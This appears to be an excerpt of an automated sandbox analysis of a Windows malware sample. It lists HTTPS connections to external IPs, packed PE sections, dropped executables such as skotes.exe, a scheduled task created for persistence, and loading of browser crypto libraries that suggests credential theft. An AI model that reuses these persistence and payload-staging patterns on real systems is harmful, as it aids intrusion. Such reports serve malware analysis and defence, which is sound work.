                      Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.7:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.7:49762 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.231.128.67:443 -> 192.168.2.7:49786 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.231.128.67:443 -> 192.168.2.7:49827 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49871 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49885 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:49955 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 45.112.123.227:443 -> 192.168.2.7:50009 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 45.112.123.225:443 -> 192.168.2.7:50015 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:50061 version: TLS 1.2

                      System Summary

                      barindex
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: .idata
                      Source: file.exeStatic PE information: section name:
                      Source: random[1].exe.2.drStatic PE information: section name:
                      Source: random[1].exe.2.drStatic PE information: section name: .idata
                      Source: random[1].exe.2.drStatic PE information: section name:
                      Source: DocumentsGDHDHJEBGH.exe.2.drStatic PE information: section name:
                      Source: DocumentsGDHDHJEBGH.exe.2.drStatic PE information: section name: .idata
                      Source: DocumentsGDHDHJEBGH.exe.2.drStatic PE information: section name:
                      Source: skotes.exe.26.drStatic PE information: section name:
                      Source: skotes.exe.26.drStatic PE information: section name: .idata
                      Source: skotes.exe.26.drStatic PE information: section name:
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeFile created: C:\Windows\Tasks\skotes.job
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDEECC02_2_6CDEECC0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE4ECD02_2_6CE4ECD0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDFAC602_2_6CDFAC60
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CECAC302_2_6CECAC30
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEB6C002_2_6CEB6C00
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF7CDC02_2_6CF7CDC0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDF4DB02_2_6CDF4DB0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE86D902_2_6CE86D90
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEBED702_2_6CEBED70
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF1AD502_2_6CF1AD50
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF78D202_2_6CF78D20
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDFAEC02_2_6CDFAEC0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE90EC02_2_6CE90EC0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE76E902_2_6CE76E90
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE8EE702_2_6CE8EE70
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CED0E202_2_6CED0E20
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CECEFF02_2_6CECEFF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDF0FE02_2_6CDF0FE0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF38FB02_2_6CF38FB0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDFEFB02_2_6CDFEFB0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEB2F702_2_6CEB2F70
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE5EF402_2_6CE5EF40
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDF6F102_2_6CDF6F10
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF30F202_2_6CF30F20
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEF68E02_2_6CEF68E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEC48402_2_6CEC4840
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE408202_2_6CE40820
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE7A8202_2_6CE7A820
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF0C9E02_2_6CF0C9E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE249F02_2_6CE249F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE809A02_2_6CE809A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEAA9A02_2_6CEAA9A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEB09B02_2_6CEB09B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE289602_2_6CE28960
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE469002_2_6CE46900
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE6EA802_2_6CE6EA80
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE6CA702_2_6CE6CA70
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEA8A302_2_6CEA8A30
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE9EA002_2_6CE9EA00
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEF6BE02_2_6CEF6BE0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE90BA02_2_6CE90BA0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE364D02_2_6CE364D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE8A4D02_2_6CE8A4D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF1A4802_2_6CF1A480
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE084602_2_6CE08460
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE544202_2_6CE54420
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE7A4302_2_6CE7A430
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEBA5E02_2_6CEBA5E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE7E5F02_2_6CE7E5F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDE45B02_2_6CDE45B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE525602_2_6CE52560
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE905702_2_6CE90570
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF385502_2_6CF38550
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE485402_2_6CE48540
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEF45402_2_6CEF4540
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE4E6E02_2_6CE4E6E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE8E6E02_2_6CE8E6E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE146D02_2_6CE146D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE4C6502_2_6CE4C650
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE1A7D02_2_6CE1A7D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE707002_2_6CE70700
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDE80902_2_6CDE8090
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE000B02_2_6CE000B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CECC0B02_2_6CECC0B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE3E0702_2_6CE3E070
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEBC0002_2_6CEBC000
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEB80102_2_6CEB8010
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDF01E02_2_6CDF01E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE581402_2_6CE58140
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE661302_2_6CE66130
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CED41302_2_6CED4130
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF762C02_2_6CF762C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEC22A02_2_6CEC22A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEBE2B02_2_6CEBE2B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE782602_2_6CE78260
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE882502_2_6CE88250
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEC82202_2_6CEC8220
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEBA2102_2_6CEBA210
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE443E02_2_6CE443E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE223A02_2_6CE223A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE4E3B02_2_6CE4E3B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF323702_2_6CF32370
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF0C3602_2_6CF0C360
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE863702_2_6CE86370
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDF83402_2_6CDF8340
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDF23702_2_6CDF2370
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE623202_2_6CE62320
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEB1CE02_2_6CEB1CE0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF2DCD02_2_6CF2DCD0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDF3C402_2_6CDF3C40
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF19C402_2_6CF19C40
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE01C302_2_6CE01C30
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEC1DC02_2_6CEC1DC0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDE3D802_2_6CDE3D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF39D902_2_6CF39D90
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE53D002_2_6CE53D00
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE13EC02_2_6CE13EC0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF4BE702_2_6CF4BE70
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF75E602_2_6CF75E60
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEFDE102_2_6CEFDE10
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE9BFF02_2_6CE9BFF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF0DFC02_2_6CF0DFC0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF73FC02_2_6CF73FC0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE11F902_2_6CE11F90
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE25F202_2_6CE25F20
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF47F202_2_6CF47F20
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDE5F302_2_6CDE5F30
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE238E02_2_6CE238E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF4B8F02_2_6CF4B8F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CECF8F02_2_6CECF8F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDFD8E02_2_6CDFD8E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE4D8102_2_6CE4D810
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE559F02_2_6CE559F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE879F02_2_6CE879F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE899C02_2_6CE899C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE299D02_2_6CE299D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE019802_2_6CE01980
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEC19902_2_6CEC1990
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE6F9602_2_6CE6F960
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEAD9602_2_6CEAD960
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEA59202_2_6CEA5920
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF3F9002_2_6CF3F900
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDF1AE02_2_6CDF1AE0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CECDAB02_2_6CECDAB0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF79A502_2_6CF79A50
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEEDA302_2_6CEEDA30
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE2FA102_2_6CE2FA10
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 31_2_003FE53031_2_003FE530
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 31_2_0043704931_2_00437049
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 31_2_0043886031_2_00438860
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 31_2_004378BB31_2_004378BB
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 31_2_00432D1031_2_00432D10
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 31_2_003F4DE031_2_003F4DE0
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 31_2_004331A831_2_004331A8
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 31_2_003F4B3031_2_003F4B30
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 31_2_00427F3631_2_00427F36
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 31_2_0043779B31_2_0043779B
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 6CE4C5E0 appears 35 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 6CF29F30 appears 32 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 6CE13620 appears 84 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 6CE19B10 appears 89 times
                      Source: file.exe, 00000002.00000002.1868983352.0000000070152000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
                      Source: file.exe, 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs file.exe
                      Source: file.exe, 00000002.00000002.1858312701.0000000023E51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: file.exeStatic PE information: Section: oxalzsyt ZLIB complexity 0.9948463808565153
                      Source: random[1].exe.2.drStatic PE information: Section: ZLIB complexity 0.9981000936648501
